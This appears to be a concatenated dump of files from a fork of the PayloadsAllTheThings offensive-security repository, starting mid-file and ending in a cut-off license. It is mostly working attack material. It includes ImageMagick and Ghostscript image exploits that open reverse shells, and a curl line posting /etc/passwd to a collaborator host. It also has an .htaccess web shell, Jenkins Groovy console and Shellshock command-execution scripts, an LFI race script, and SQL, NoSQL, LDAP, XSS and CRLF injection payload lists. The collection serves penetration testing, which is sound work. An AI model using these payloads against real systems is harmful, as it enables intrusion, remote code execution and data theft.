viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context 
-------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_image.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_import.svg: -------------------------------------------------------------------------------- 1 | 2 | 5 | 7 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | save 4 | legal 5 | { null restore } stopped { pop } if 6 | { legal } stopped { pop } if 7 | restore 8 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt: -------------------------------------------------------------------------------- 1 | # mysql local file 
disclosure through sqli 2 | # fuzz interesting absolute filepath/filename into 3 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 4 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg: -------------------------------------------------------------------------------- 1 | 3 | xmlns="http://www.w3.org/2000/svg"> 4 | 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg: -------------------------------------------------------------------------------- 1 | 3 | xmlns="http://www.w3.org/2000/svg"> 4 | 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 
'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /File Inclusion/Intruders/Mac-files.txt: -------------------------------------------------------------------------------- 1 | /etc/apache2/httpd.conf 2 | /Library/WebServer/Documents/index.html 3 | /private/var/log/appstore.log 4 | /var/log/apache2/error_log 5 | /var/log/apache2/access_log 6 | /usr/local/nginx/conf/nginx.conf 7 | /var/log/nginx/error_log 8 | /var/log/nginx/access_log -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | save 4 | legal 5 | { null restore } stopped { pop } if 6 | { legal } stopped { pop } if 7 | restore 8 | mark /OutputFile (%pipe%ncat 127.0.0.1 4242 -e /bin/sh) currentdevice putdeviceprops 9 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_iframe.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Upload Insecure Files/Server Side Include/index.stm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension 
PHP/extensions.lst: -------------------------------------------------------------------------------- 1 | .jpeg.php 2 | .jpg.php 3 | .png.php 4 | .php 5 | .php3 6 | .php4 7 | .php5 8 | .php7 9 | .pht 10 | .phar 11 | .phpt 12 | .pgif 13 | .phtml 14 | .phtm 15 | .php%00.gif 16 | .php\x00.gif 17 | .php%00.png 18 | .php\x00.png 19 | .php%00.jpg 20 | .php\x00.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | encoding "UTF-8" 3 | viewbox 0 0 1 1 4 | affine 1 0 0 1 0 0 5 | push graphic-context 6 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' 7 | pop graphic-context 8 | pop graphic-context 9 | 10 | -------------------------------------------------------------------------------- /File Inclusion/Intruders/Web-files.txt: -------------------------------------------------------------------------------- 1 | /robots.txt 2 | /humans.txt 3 | /style.css 4 | /configuration.php 5 | wp-login.php 6 | wp-admin.php 7 | /wp-content/plugins 8 | /include/config.php 9 | /inc/config.php 10 | /include/mysql.php 11 | /inc/mysql.php 12 | /sites/defaults/settings.php 13 | /phpmyadmin/changelog.php 14 | web.config -------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_attributes.txt: -------------------------------------------------------------------------------- 1 | c 2 | cn 3 | co 4 | commonName 5 | dc 6 | facsimileTelephoneNumber 7 | givenName 8 | gn 9 | homePhone 10 | id 11 | jpegPhoto 12 | l 13 | mail 14 | mobile 15 | name 16 | o 17 | objectClass 18 | ou 19 | owner 20 | pager 21 | password 22 | sn 23 | st 24 | surname 25 | uid 26 | username 27 | userPassword 28 | -------------------------------------------------------------------------------- /Server Side Request 
Forgery/Files/ssrf_svg_css_link.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | 6 | -------------------------------------------------------------------------------- /XXE Injection/Files/Deny Of Service - Billion Laugh Attack: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | 6 | 7 | ]> 8 | &a4; -------------------------------------------------------------------------------- /SQL Injection/Intruder/SQLi_Polyglots.txt: -------------------------------------------------------------------------------- 1 | SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ 2 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample 3 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | encoding "UTF-8" 3 | viewbox 0 0 1 1 4 | affine 1 0 0 1 0 0 5 | push graphic-context 6 | image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0/tmp/gjdpez 2>&1; rm /tmp/gjdpez ' 7 | pop graphic-context 8 | pop graphic-context 9 | -------------------------------------------------------------------------------- /XXE Injection/Files/XXE PHP Wrapper.xml: -------------------------------------------------------------------------------- 1 | ]> 2 | 3 | 4 | Jean &xxe; Dupont 5 | 00 11 22 33 44 6 |
42 rue du CTF
7 | 75000 8 | Paris 9 |
10 |
11 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 9 | -------------------------------------------------------------------------------- /XXE Injection/Files/XXE OOB Attack (Yunusov, 2013).xml: -------------------------------------------------------------------------------- 1 | XXE OOB Attack (Yunusov, 2013) 2 | 3 | 4 | &send; 5 | 6 | File stored on http://publicServer.com/parameterEntity_oob.dtd 7 | 8 | "> 9 | %all; -------------------------------------------------------------------------------- /File Inclusion/Intruders/BSD-files.txt: -------------------------------------------------------------------------------- 1 | /usr/pkg/etc/httpd/httpd.conf 2 | /usr/local/etc/apache22/httpd.conf 3 | /usr/local/etc/apache2/httpd.conf 4 | /var/www/conf/httpd.conf 5 | /var/www/logs/error_log 6 | /var/www/logs/access_log 7 | /etc/apache2/httpd2.conf 8 | /var/apache2/logs/error_log 9 | /var/apache2/logs/access_log 10 | /var/log/httpd-error.log 11 | /var/log/httpd-access.log 12 | /var/log/httpd/error_log 13 | /var/log/httpd/access_log -------------------------------------------------------------------------------- /XSS Injection/Intruders/BRUTELOGIC-XSS-JS.txt: -------------------------------------------------------------------------------- 1 | alert`1` 2 | alert(1) 3 | alert(1) 4 | alert(1) 5 | (alert)(1) 6 | a=alert,a(1) 7 | [1].find(alert) 8 | top["al"+"ert"](1) 9 | top[/al/.source+/ert/.source](1) 10 | al\u0065rt(1) 11 | top['al\145rt'](1) 12 | top['al\x65rt'](1) 13 | top[8680439..toString(30)](1) 14 | navigator.vibrate(500) 15 | eval(URL.slice(-8))>#alert(1) 16 | eval(location.hash.slice(1)>#alert(1) 17 | innerHTML=location.hash># 18 | -------------------------------------------------------------------------------- /_template_vuln/README.md: 
-------------------------------------------------------------------------------- 1 | # Vulnerability Title 2 | 3 | > Vulnerability description - reference 4 | 5 | ## Summary 6 | 7 | - [Tools](#tools) 8 | * [Something](#something) 9 | * [Subentry 1](#sub1) 10 | * [Subentry 2](#sub2) 11 | 12 | ## Tools 13 | 14 | - [Tool 1](https://example.com) 15 | - [Tool 2](https://example.com) 16 | 17 | ## Something 18 | 19 | Quick explanation 20 | 21 | ```powershell 22 | Exploit 23 | ``` 24 | 25 | ## References 26 | 27 | - [Blog title - Author, Date](https://example.com) -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 7 | 9 | -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | alert(1) 5 | alert(2) 6 | 7 | 8 | confirm(document.domain)]]> 9 | 10 | 11 | Hello 12 | 13 | 14 | http://google.com 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Methodology and Resources/Miscellaneous - Tricks.md: -------------------------------------------------------------------------------- 1 | # Miscellaneous & Tricks 2 | 3 | All the tricks that couldn't be classified somewhere else. 4 | 5 | ## Send a message to another user 6 | 7 | ```powershell 8 | # Windows 9 | PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" 10 | PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" 11 | 12 | # Linux 13 | $ wall "Stop messing with the XXX service !" 14 | $ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root 15 | $ who 16 | $ write root pts/2 # press Ctrl+D after typing the message. 
17 | ``` -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess: -------------------------------------------------------------------------------- 1 | # Self contained .htaccess web shell - Part of the htshell project 2 | # Written by Wireghoul - http://www.justanotherhacker.com 3 | 4 | # Override default deny rule to make .htaccess file accessible over web 5 | 6 | Order allow,deny 7 | Allow from all 8 | 9 | 10 | # Make .htaccess file be interpreted as php file. This occurs after Apache has interpreted 11 | # the Apache directives from the .htaccess file 12 | AddType application/x-httpd-php .htaccess 13 | 14 | ###### SHELL ###### &1"); ?>###### LLEHS ###### 15 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Busybox httpd.conf/README.md: -------------------------------------------------------------------------------- 1 | If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter. 2 | 3 | Details from Busybox httpd.c 4 | 5 | https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60 6 | 7 | > *.php:/path/php # run xxx.php through an interpreter` 8 | 9 | > If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration. 
10 | 11 | Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you can't see these in Burp :) 12 | -------------------------------------------------------------------------------- /CRLF Injection/crlfinjection.txt: -------------------------------------------------------------------------------- 1 | /%%0a0aSet-Cookie:crlf=injection 2 | /%0aSet-Cookie:crlf=injection 3 | /%0d%0aSet-Cookie:crlf=injection 4 | /%0dSet-Cookie:crlf=injection 5 | /%23%0aSet-Cookie:crlf=injection 6 | /%23%0d%0aSet-Cookie:crlf=injection 7 | /%23%0dSet-Cookie:crlf=injection 8 | /%25%30%61Set-Cookie:crlf=injection 9 | /%25%30aSet-Cookie:crlf=injection 10 | /%250aSet-Cookie:crlf=injection 11 | /%25250aSet-Cookie:crlf=injection 12 | /%2e%2e%2f%0d%0aSet-Cookie:crlf=injection 13 | /%2f%2e%2e%0d%0aSet-Cookie:crlf=injection 14 | /%2F..%0d%0aSet-Cookie:crlf=injection 15 | /%3f%0d%0aSet-Cookie:crlf=injection 16 | /%3f%0dSet-Cookie:crlf=injection 17 | /%u000aSet-Cookie:crlf=injection 18 | -------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_FUZZ.txt: -------------------------------------------------------------------------------- 1 | * 2 | *)(& 3 | *))%00 4 | *()|%26' 5 | *()|&' 6 | *(|(mail=*)) 7 | *(|(objectclass=*)) 8 | *)(uid=*))(|(uid=* 9 | */* 10 | *| 11 | / 12 | // 13 | //* 14 | @* 15 | | 16 | admin* 17 | admin*)((|userpassword=*) 18 | admin*)((|userPassword=*) 19 | x' or name()='username' or 'x'='y 20 | ! 
21 | %21 22 | %26 23 | %28 24 | %29 25 | %2A%28%7C%28mail%3D%2A%29%29 26 | %2A%28%7C%28objectclass%3D%2A%29%29 27 | %2A%7C 28 | %7C 29 | & 30 | ( 31 | ) 32 | )(cn=))\x00 33 | *(|(mail=*)) 34 | *(|(objectclass=*)) 35 | */* 36 | *| 37 | / 38 | // 39 | //* 40 | @* 41 | x' or name()='username' or 'x'='y 42 | | 43 | *()|&' 44 | admin* 45 | admin*)((|userpassword=*) 46 | *)(uid=*))(|(uid=* 47 | -------------------------------------------------------------------------------- /NoSQL Injection/Intruder/NoSQL.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | {"$gt": ""} 18 | [$ne]=1 19 | ';sleep(5000); 20 | ';sleep(5000);' 21 | ';sleep(5000);+' 22 | ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); 23 | -------------------------------------------------------------------------------- /XSS Injection/Files/JupyterNotebookXSS.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Cg==)\n" 8 | ] 9 | } 10 | ], 11 | "metadata": { 12 | "kernelspec": { 13 | "display_name": "Python 3", 14 | "language": "python", 15 | "name": "python3" 16 | }, 17 | "language_info": { 18 | "codemirror_mode": { 19 | "name": "ipython", 20 | "version": 3 21 | }, 22 | "file_extension": ".py", 23 | 
"mimetype": "text/x-python", 24 | "name": "python", 25 | "nbconvert_exporter": "python", 26 | "pygments_lexer": "ipython3", 27 | "version": "3.6.2" 28 | } 29 | }, 30 | "nbformat": 4, 31 | "nbformat_minor": 2 32 | } 33 | -------------------------------------------------------------------------------- /File Inclusion/uploadlfi.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from builtins import range 3 | import itertools 4 | import requests 5 | import string 6 | import sys 7 | 8 | print('[+] Trying to win the race') 9 | f = {'file': open('shell.php', 'rb')} 10 | for _ in range(4096 * 4096): 11 | requests.post('http://target.com/index.php?c=index.php', f) 12 | 13 | 14 | print('[+] Bruteforcing the inclusion') 15 | for fname in itertools.combinations(string.ascii_letters + string.digits, 6): 16 | url = 'http://target.com/index.php?c=/tmp/php' + fname 17 | r = requests.get(url) 18 | if 'load average' in r.text: # 8 | Require all granted 9 | Order allow,deny 10 | Allow from all 11 | 12 | 13 | # Make the server treat .htaccess file as .php file 14 | AddType application/x-httpd-php .htaccess 15 | 16 | # 17 | 18 | # To execute commands you would navigate to: 19 | # http://vulnerable.com/.htaccess?cmd=YourCommand 20 | 21 | # If system(); isnt working then try other syscalls 22 | # e.g. 
passthru(); shell_exec(); etc 23 | # If you still can't execute syscalls, try bypassing php.ini via htaccess 24 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_Postgres_Enumeration.txt: -------------------------------------------------------------------------------- 1 | # info disclosure payload fuzzfile for pgsql 2 | select version(); 3 | select current_database(); 4 | select current_user; 5 | select session_user; 6 | select current_setting('log_connections'); 7 | select current_setting('log_statement'); 8 | select current_setting('port'); 9 | select current_setting('password_encryption'); 10 | select current_setting('krb_server_keyfile'); 11 | select current_setting('virtual_host'); 12 | select current_setting('port'); 13 | select current_setting('config_file'); 14 | select current_setting('hba_file'); 15 | select current_setting('data_directory'); 16 | select * from pg_shadow; 17 | select * from pg_group; 18 | create table myfile (input TEXT); 19 | copy myfile from '/etc/passwd'; 20 | select * from myfile;copy myfile to /tmp/test; 21 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension Flash/README.md: -------------------------------------------------------------------------------- 1 | ### XSS via SWF 2 | 3 | As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to present this SWF file that you can use in your PoCs. 4 | This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. 
5 | 6 | ```powershell 7 | Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); 8 | 9 | IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} 10 | 11 | IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); 12 | ``` -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/README.md: -------------------------------------------------------------------------------- 1 | # Image Tragik 1 & 2 2 | 3 | 4 | ## Exploit v1 5 | 6 | Simple reverse shell 7 | 8 | ```powershell 9 | push graphic-context 10 | encoding "UTF-8" 11 | viewbox 0 0 1 1 12 | affine 1 0 0 1 0 0 13 | push graphic-context 14 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' 15 | pop graphic-context 16 | pop graphic-context 17 | ``` 18 | 19 | ## Exploit v2 20 | 21 | Simple `id` payload 22 | 23 | ```powershell 24 | %!PS 25 | userdict /setpagedevice undef 26 | save 27 | legal 28 | { null restore } stopped { pop } if 29 | { legal } stopped { pop } if 30 | restore 31 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops 32 | ``` 33 | 34 | then use `convert shellexec.jpeg whatever.gif` 35 | 36 | ## Thanks to 37 | 38 | * [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2) -------------------------------------------------------------------------------- /File Inclusion/Intruders/LFI-FD-check.txt: -------------------------------------------------------------------------------- 1 | /proc/self/cmdline 2 | /proc/self/stat 3 | /proc/self/status 4 | /proc/self/fd/0 5 | /proc/self/fd/1 6 | /proc/self/fd/2 7 | /proc/self/fd/3 8 | /proc/self/fd/4 9 | /proc/self/fd/5 10 | /proc/self/fd/6 11 | /proc/self/fd/7 12 | /proc/self/fd/8 13 | /proc/self/fd/9 14 | /proc/self/fd/10 
15 | /proc/self/fd/11 16 | /proc/self/fd/12 17 | /proc/self/fd/13 18 | /proc/self/fd/14 19 | /proc/self/fd/15 20 | /proc/self/fd/16 21 | /proc/self/fd/17 22 | /proc/self/fd/18 23 | /proc/self/fd/19 24 | /proc/self/fd/20 25 | /proc/self/fd/21 26 | /proc/self/fd/22 27 | /proc/self/fd/23 28 | /proc/self/fd/24 29 | /proc/self/fd/25 30 | /proc/self/fd/26 31 | /proc/self/fd/27 32 | /proc/self/fd/28 33 | /proc/self/fd/29 34 | /proc/self/fd/30 35 | /proc/self/fd/31 36 | /proc/self/fd/32 37 | /proc/self/fd/33 38 | /proc/self/fd/34 39 | /proc/self/fd/35 -------------------------------------------------------------------------------- /XSS Injection/Intruders/xss_swf_fuzz.txt: -------------------------------------------------------------------------------- 1 | #getURL,javascript:alert(1)", 2 | #goto,javascript:alert(1)", 3 | ?javascript:alert(1)", 4 | ?alert(1)", 5 | ?getURL(javascript:alert(1))", 6 | ?asfunction:getURL,javascript:alert(1)//", 7 | ?getURL,javascript:alert(1)", 8 | ?goto,javascript:alert(1)", 9 | ?clickTAG=javascript:alert(1)", 10 | ?url=javascript:alert(1)", 11 | ?clickTAG=javascript:alert(1)&TargetAS=", 12 | ?TargetAS=javascript:alert(1)", 13 | ?skinName=asfunction:getURL,javascript:alert(1)//", 14 | ?baseurl=asfunction:getURL,javascript:alert(1)//", 15 | ?base=javascript:alert(0)", 16 | ?onend=javascript:alert(1)//", 17 | ?userDefined=');function someFunction(a){}alert(1)//", 18 | ?URI=javascript:alert(1)", 19 | ?callback=javascript:alert(1)", 20 | ?getURLValue=javascript:alert(1)", 21 | ?goto=javascript:alert(1)", 22 | ?pg=javascript:alert(1)", 23 | ?page=javascript:alert(1)" 24 | ?playerready=alert(document.cookie) 25 | -------------------------------------------------------------------------------- /Open Redirect/Intruder/open_redirect_wordlist.txt: -------------------------------------------------------------------------------- 1 | /http://example.com 2 | /%5cexample.com 3 | /%2f%2fexample.com 4 | /example.com/%2f%2e%2e 5 | /http:/example.com 6 | 
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com 7 | /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com 8 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com 9 | /redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com 10 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com 11 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com 12 | /.example.com 13 | ///\;@example.com 14 | ///example.com/ 15 | ///example.com 16 | ///example.com/%2f.. 17 | /////example.com/ 18 | /////example.com -------------------------------------------------------------------------------- /SQL Injection/Cassandra Injection.md: -------------------------------------------------------------------------------- 1 | # Cassandra Injection 2 | 3 | > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system 4 | 5 | ## Summary 6 | 7 | * [Cassandra comment](#cassandra-comment) 8 | * [Cassandra - Login Bypass](#cassandra---login-bypass) 9 | * [Login Bypass 0](#login-bypass-0) 10 | * [Login Bypass 1](#login-bypass-1) 11 | * [References](#references) 12 | 13 | ## Cassandra comment 14 | 15 | ```sql 16 | /* Cassandra Comment */ 17 | ``` 18 | 19 | ## Cassandra - Login Bypass 20 | 21 | ### Login Bypass 0 22 | 23 | ```sql 24 | username: admin' ALLOW FILTERING; %00 25 | password: ANY 26 | ``` 27 | 28 | ### Login Bypass 1 29 | 30 | ```sql 31 | username: admin'/* 32 | password: */and pass>' 33 | ``` 34 | 35 | The injection would look like the following SQL query 36 | 37 | ```sql 38 | SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; 39 | ``` 40 | 41 | ## References 42 | 43 | 44 | 
-------------------------------------------------------------------------------- /Insecure Management Interface/Intruder/springboot_actuator.txt: -------------------------------------------------------------------------------- 1 | auditevents 2 | autoconfig 3 | beans 4 | caches 5 | conditions 6 | configprops 7 | dump 8 | env 9 | flyway 10 | health 11 | heapdump 12 | httptrace 13 | info 14 | integrationgraph 15 | jolokia 16 | logfile 17 | loggers 18 | liquibase 19 | metrics 20 | mappings 21 | prometheus 22 | scheduledtasks 23 | sessions 24 | shutdown 25 | threaddump 26 | trace 27 | actuator/auditevents 28 | actuator/autoconfig 29 | actuator/beans 30 | actuator/caches 31 | actuator/conditions 32 | actuator/configprops 33 | actuator/dump 34 | actuator/env 35 | actuator/flyway 36 | actuator/health 37 | actuator/heapdump 38 | actuator/httptrace 39 | actuator/info 40 | actuator/integrationgraph 41 | actuator/jolokia 42 | actuator/logfile 43 | actuator/loggers 44 | actuator/liquibase 45 | actuator/metrics 46 | actuator/mappings 47 | actuator/prometheus 48 | actuator/scheduledtasks 49 | actuator/sessions 50 | actuator/shutdown 51 | actuator/threaddump 52 | actuator/trace -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.xamlx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | [System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()] 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /CVE Exploits/Jenkins Groovy Console.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py 3 | # DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b 4 | from __future__ import print_function 5 | from 
builtins import input 6 | import requests 7 | import sys 8 | 9 | print(""" 10 | Jenkins Groovy Console cmd runner. 11 | 12 | usage: ./jgc.py [HOST] 13 | 14 | Then type any command and wait for STDOUT output from remote machine. 15 | Type 'exit' to exit :) 16 | """) 17 | URL = sys.argv[1] + '/scriptText' 18 | HEADERS = { 19 | 'User-Agent': 'jgc' 20 | } 21 | 22 | while 1: 23 | CMD = input(">> Enter command to execute (or type 'exit' to exit): ") 24 | if CMD == 'exit': 25 | print("exiting...\n") 26 | exit(0) 27 | 28 | DATA = { 29 | 'script': 'println "{}".execute().text'.format(CMD) 30 | } 31 | result = requests.post(URL, headers=HEADERS, data=DATA) 32 | print(result.text) -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py: -------------------------------------------------------------------------------- 1 | # Generating "evil" zip file 2 | # Based on the work of Ajin Abraham 3 | # Vuln website : https://github.com/ajinabraham/bad_python_extract 4 | # More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution 5 | 6 | # Warning 1: need a restart from the server OR debug=True 7 | # Warning 2: you won't get the output of the command (blind rce) 8 | import zipfile 9 | 10 | directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"] 11 | for d in directories: 12 | name = "python-"+d+"-__init__.py.zip" 13 | zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED) 14 | zipf.close() 15 | z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py") 16 | z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+ 17 | z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');") 18 | z_info.external_attr = 0o777 << 16 19 | z_file.close() 20 | -------------------------------------------------------------------------------- /Upload Insecure 
Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 6 | -------------------------------------------------------------------------------- /CVE Exploits/Shellshock CVE-2014-6271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Successful Output: 4 | # # python shell_shocker.py 5 | # [+] Attempting Shell_Shock - Make sure to type full path 6 | # ~$ /bin/ls / 7 | # bin 8 | # boot 9 | # dev 10 | # etc 11 | # .. 12 | # ~$ /bin/cat /etc/passwd 13 | 14 | from __future__ import print_function 15 | from future import standard_library 16 | standard_library.install_aliases() 17 | from builtins import input 18 | import sys, urllib.request, urllib.error, urllib.parse 19 | 20 | if len(sys.argv) != 2: 21 | print("Usage: shell_shocker ") 22 | sys.exit(0) 23 | 24 | URL=sys.argv[1] 25 | print("[+] Attempting Shell_Shock - Make sure to type full path") 26 | 27 | while True: 28 | command=input("~$ ") 29 | opener=urllib.request.build_opener() 30 | opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)] 31 | try: 32 | response=opener.open(URL) 33 | for line in response.readlines(): 34 | print(line.strip()) 35 | except Exception as e: print(e) 36 | 37 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Swissky 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this 